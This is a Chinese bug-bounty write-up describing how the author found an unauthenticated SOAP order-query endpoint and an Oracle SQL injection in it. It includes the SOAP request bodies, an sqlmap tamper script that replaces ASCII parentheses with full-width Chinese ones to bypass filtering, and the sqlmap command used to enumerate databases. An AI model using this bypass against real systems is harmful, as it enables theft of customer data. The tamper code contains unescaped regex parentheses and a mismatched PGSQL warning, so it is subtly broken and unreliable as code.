Soap注入意外发现Oralcle注入漏洞

在对某 SRC 测试时，根据证书信息收集到了部分深度子域名，并且找到了对应的ip段，fuzz出了其src的c段资产

0X01 webservice 的服务器

      在C段资产中发现了webservice 的服务器，并且获取到了对应接口。

使用 soup ui 进行调试数据

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"xmlns:odc="http://odc.ws.qiku.com/">

<soapenv:Header/>

<soapenv:Body>

<odc:syncOrderInfo>

<!--Optional:-->

<arg0></arg0>

</odc:syncOrderInfo>

</soapenv:Body>

</soapenv:Envelope>

<arg0></arg0>

ps：当<arg0></arg0>中间无参数值时 ， Soap 接口抛出了一个 Oracle 的错误信息，并提示“Date format error,YY-MM-DD”

构造一个符合条件的 date 数据

比如2023-2-16

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"xmlns:odc="http://odc.ws.qiku.com/">

<soapenv:Header/>

<soapenv:Body>

<odc:syncOrderInfo>

<!--Optional:-->

<arg0>2023-2-16</arg0>

</odc:syncOrderInfo>

</soapenv:Body>

</soapenv:Envelope>

arg0 处为日期参数，指定日期，即可查询到 xx src 商城所有订单信息属于严重泄露客户数据的漏洞

0X02 Oracle的数据库注入漏洞

注入时发现数据包会规律()，这里小说一个关于oracle的骚知识：在 Oracle 中文版本中,中文括号（）可以代替英文()而且不报错！

编写一个tamper

#!/usr/bin/env python

""" Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)

See the file 'doc/COPYING' for copying permission

"""

import os

import re

from lib.core.common import singleTimeWarnMessage

from lib.core.enums import DBMS

from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST

def dependencies():

singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" %(os.path.basename(__file__).split(".")[0], DBMS.PGSQL))

def tamper(payload, **kwargs):

retVal = payload

if payload:

retVal = re.sub(r"\s*(\s*", "（", retVal)

retVal = re.sub(r"\s*)\s*", "）", retVal)

return retVal

使用sqlmap进行注入 ，命令：python sqlmap.py -r xxx.txt --dbs --tamper=brackets.py ；  #在日期处加*